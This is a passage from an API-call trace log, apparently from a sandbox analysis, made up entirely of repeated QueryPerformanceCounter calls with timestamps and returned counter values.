lpPerformanceCount=0x6adfdfc*=3096307500385) returned 1 [0144.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096307517438) returned 1 [0144.272] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096309094818) returned 1 [0144.272] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096309112416) returned 1 [0144.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096310698182) returned 1 [0144.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096310718310) returned 1 [0144.304] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096312298150) returned 1 [0144.304] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096312315040) returned 1 [0144.321] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096313982460) returned 1 [0144.321] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096313999830) returned 1 [0144.336] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096315544544) returned 1 [0144.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096315563116) returned 1 [0144.352] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096317154762) returned 1 [0144.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096317177591) returned 1 [0144.368] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096318749885) returned 1 [0144.369] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096318767580) returned 1 [0144.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096320353938) returned 1 [0144.385] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096320380547) returned 1 [0144.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096321947467) returned 1 [0144.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096321966675) returned 1 [0144.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096323558386) returned 1 [0144.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096323588670) returned 1 [0144.432] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096325148406) returned 1 [0144.433] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096325173100) returned 1 [0144.449] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096326788129) returned 1 [0144.449] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096326804341) returned 1 [0144.464] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096328343258) returned 1 [0144.465] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096328357983) returned 1 [0144.480] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096329918482) returned 1 [0144.480] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096329932798) returned 1 [0144.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096332006618) returned 1 [0144.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096332022799) returned 1 [0144.512] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096333113692) returned 1 [0144.512] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096333127079) returned 1 [0144.528] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096334718061) returned 1 [0144.528] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096334731156) returned 1 [0144.545] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096336400617) returned 1 [0144.545] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096336417666) returned 1 [0144.560] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096337928583) returned 1 [0144.560] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096337951374) returned 1 [0144.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096339523153) returned 1 [0144.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096339540299) returned 1 [0144.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096341123237) returned 1 [0144.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096341139463) returned 1 [0144.608] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096342727227) returned 1 [0144.608] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096342748927) returned 1 [0144.624] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096344326629) returned 1 [0144.624] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096344348763) returned 1 [0144.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096345924414) returned 1 [0144.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096345947106) returned 1 [0144.656] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096347521850) returned 1 [0144.656] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096347540193) returned 1 [0144.672] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096349121572) returned 1 [0144.672] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096349135643) returned 1 [0144.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096350719090) returned 1 [0144.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096350735605) returned 1 [0144.704] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096352319108) returned 1 [0144.704] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096352335731) returned 1 [0144.745] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096356382317) returned 1 [0144.745] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096356406931) returned 1 [0144.746] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096356502578) returned 1 [0144.746] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096356518274) returned 1 [0144.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096357120294) returned 1 [0144.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096357135784) returned 1 [0144.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096358723266) returned 1 [0144.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096358740099) returned 1 [0144.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096360321671) returned 1 [0144.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096360339322) returned 1 [0144.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096361921444) returned 1 [0144.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096361938578) returned 1 [0144.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096363516856) returned 1 [0144.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096363530384) returned 1 [0144.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096365126691) returned 1 [0144.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096365165202) returned 1 [0144.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096366777332) returned 1 [0144.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096366819699) returned 1 [0144.864] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096368316638) returned 1 [0144.864] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096368330099) returned 1 [0144.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096369928803) returned 1 [0144.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096369954573) returned 1 [0144.896] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096371526940) returned 1 [0144.896] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096371550134) returned 1 [0144.912] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096373123078) returned 1 [0144.912] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096373140531) returned 1 [0144.928] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096374723812) returned 1 [0144.928] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096374742064) returned 1 [0144.944] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096376321382) returned 1 [0144.944] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096376338597) returned 1 [0144.960] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096377917955) returned 1 [0144.960] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096377935180) returned 1 [0144.976] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096379518704) returned 1 [0144.976] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096379535193) returned 1 [0144.992] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096381119629) returned 1 [0144.992] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096381137393) returned 1 [0145.008] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096382719928) returned 1 [0145.008] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096382737063) returned 1 [0145.024] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096384321100) returned 1 [0145.024] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096384339079) returned 1 [0145.040] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096385898593) returned 1 [0145.040] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096385915233) returned 1 [0145.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096387472179) returned 1 [0145.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096387491825) returned 1 [0145.072] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096389068576) returned 1 [0145.072] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096389083222) returned 1 [0145.088] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096390669004) returned 1 [0145.088] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096390684493) returned 1 [0145.104] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096392264729) returned 1 [0145.104] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096392281614) returned 1 [0145.119] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096393820367) returned 1 [0145.119] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096393838459) returned 1 [0145.135] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096395422841) returned 1 [0145.135] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096395445619) returned 1 [0145.151] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096397020902) returned 1 [0145.151] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096397037837) returned 1 [0145.167] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096398614378) returned 1 [0145.167] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096398628213) returned 1 [0145.183] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096400215667) returned 1 [0145.183] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096400230152) returned 1 [0145.200] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096401876216) returned 1 [0145.200] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096401895405) returned 1 [0145.216] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096403468583) returned 1 [0145.216] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096403484122) returned 1 [0145.232] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096405064574) returned 1 [0145.232] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096405080507) returned 1 [0145.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096406666949) returned 1 [0145.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096406681712) returned 1 [0145.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096408265759) returned 1 [0145.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096408280999) returned 1 [0145.280] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096409865025) returned 1 [0145.280] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096409878610) returned 1 [0145.296] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096411466266) returned 1 [0145.296] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096411480487) returned 1 [0145.317] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096413611160) returned 1 [0145.317] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096413625067) returned 1 [0145.333] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096415171631) returned 1 [0145.333] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096415188543) returned 1 [0145.349] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096416772659) returned 1 [0145.349] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096416796259) returned 1 [0145.365] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096418369823) returned 1 [0145.365] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096418387983) returned 1 [0145.381] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096419973310) returned 1 [0145.381] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096419991910) returned 1 [0145.397] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096421570858) returned 1 [0145.397] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096421588635) returned 1 [0145.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096423173276) returned 1 [0145.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096423196538) returned 1 [0145.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096424759838) returned 1 [0145.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096424781051) returned 1 [0145.444] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096426351899) returned 1 [0145.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096426369572) returned 1 [0145.460] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096427947165) returned 1 [0145.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096427964315) returned 1 [0145.476] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096429494477) returned 1 [0145.476] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096429508600) returned 1 [0145.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096431984379) returned 1 [0145.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096431998973) returned 1 [0145.508] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096432694825) returned 1 [0145.508] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096432709166) returned 1 [0145.524] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096434298223) returned 1 [0145.524] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096434311723) returned 1 [0145.540] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096435896090) returned 1 [0145.540] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096435909829) returned 1 [0145.556] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096437498309) returned 1 [0145.556] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096437512296) returned 1 [0145.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096439093642) returned 1 [0145.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096439107313) returned 1 [0145.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096441082489) returned 1 [0145.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096441101118) returned 1 [0145.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096442625152) returned 1 [0145.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096442639441) returned 1 [0145.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096444220493) returned 1 [0145.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096444234018) returned 1 [0145.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096445821067) returned 1 [0145.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096445834782) returned 1 [0145.655] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096447423882) returned 1 [0145.655] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096447437953) returned 1 [0145.671] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096449020984) returned 1 [0145.671] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096449034534) returned 1 [0145.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096450623669) returned 1 [0145.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096450637005) returned 1 [0145.703] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096452222906) returned 1 [0145.703] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096452236268) returned 1 [0145.719] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096453828515) returned 1 [0145.719] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096453845206) returned 1 [0145.735] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096455424570) returned 1 [0145.735] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096455441711) returned 1 [0145.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096457126725) returned 1 [0145.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096457144165) returned 1 [0145.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096458726431) returned 1 [0145.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096458743030) returned 1 [0145.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096460333465) returned 1 [0145.785] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096460364015) returned 1 [0145.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096461925186) returned 1 [0145.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096461941537) returned 1 [0145.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096463533859) returned 1 [0145.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096463554826) returned 1 [0145.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096465127108) returned 1 [0145.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096465143973) returned 1 [0145.848] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096466725127) returned 1 [0145.848] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096466742503) returned 1 [0145.864] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096468328211) returned 1 [0145.864] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096468345663) returned 1 [0145.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096469929161) returned 1 [0145.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096469950676) returned 1 [0145.931] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096474975423) returned 1 [0145.931] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096474994750) returned 1 [0145.931] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096475033722) returned 1 [0145.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096475057510) returned 1 [0145.944] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 